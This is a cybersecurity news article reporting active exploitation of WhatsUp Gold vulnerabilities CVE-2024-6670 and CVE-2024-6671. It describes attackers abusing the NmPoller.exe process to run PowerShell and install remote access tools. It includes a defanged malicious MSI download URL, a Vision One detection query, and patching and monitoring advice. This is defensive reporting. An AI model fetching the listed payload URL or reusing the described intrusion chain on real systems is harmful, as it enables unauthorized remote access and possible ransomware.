Hackers Actively Exploiting Dangerous WhatsUp RCE Vulnerability

Remote code execution attacks on WhatsUp Gold exploited the Active Monitor PowerShell Script beginning August 30, leveraging vulnerabilities CVE-2024-6670 and CVE-2024-6671. Despite patches released on August 16, delayed application by some organizations led to immediate incidents following the PoC’s publication.

The attackers exploited NmPoller.exe to run PowerShell scripts and install remote access tools. To prevent this, enforce access controls on corporate services, apply patches promptly, and monitor for suspicious process activity in WhatsUp Gold environments.

A suspicious script from a malicious website was unexpectedly executed on the WhatsUp Gold server. Despite no previous signs of unauthorized access or malware activity, the incident likely indicates a system vulnerability that was exploited.

Execution profile for the abuse of NmPoller.exe

The WhatsUp Gold polling process, NmPoller.exe, was exploited to execute malicious PowerShell scripts, as threat actors abused the process’s ability to host scripts to remotely execute arbitrary code. 

The malicious code, consisting of a prefix and malicious payload, was injected into the polling process, where various variations of the malicious code have been observed. NmPoller.exe executed malicious PowerShell scripts, downloading remote payloads and installing suspicious MSIs. 

The threat actor tried to install Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote RATs on the target system using PowerShell and msiexec.exe. 

Execution profile for msiexec.exe installing Atera Agent and Splashtop Remote

A single MSI installer from hxxps://fedko[.]org/wp-includes/ID3/setup.msi installed Atera Agent and Splashtop Remote, which were identified as remote access tools (RATs). 

The MXDR team effectively contained the incident, preventing further damage while the threat actor remains unidentified but is suspected to be associated with ransomware due to the use of multiple RATs.

The product vendor released a patch for a vulnerability on August 16, and a PoC was published on August 30, which was likely due to the PoC’s availability over a long weekend in the US, when many organizations might have had difficulty applying the patch promptly.

The recent patch, released prior to the PoC, addresses a high-severity vulnerability. Applying the patch proactively can mitigate risks, even without a public PoC. 

Censys reports 1,207 exposed devices online for CVE-2024-4885, a critical vulnerability fixed in June along with other recent disclosures, may have heightened threat actor interest.

The spike of the number of events in the search results in the incident

Monitoring the nmpoller.exe process for suspicious process creation events can help detect potential attacks. The search query “nmpoller.exe” AND eventSubId:(2 OR 101 OR 109 OR 901) can be used in Vision One to detect potential security incidents related to WhatsUp Gold. 

By monitoring for unexpected events like product restarts, logfile creations, and spikes in event frequency, administrators can identify malicious activities such as external MSI package installations, RAT installations, and suspicious file creations. 

Additionally, monitoring PowerShell scripts executed by WhatsUp Gold’s Active Monitor PowerShell Script function can help prevent unauthorized code execution.

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here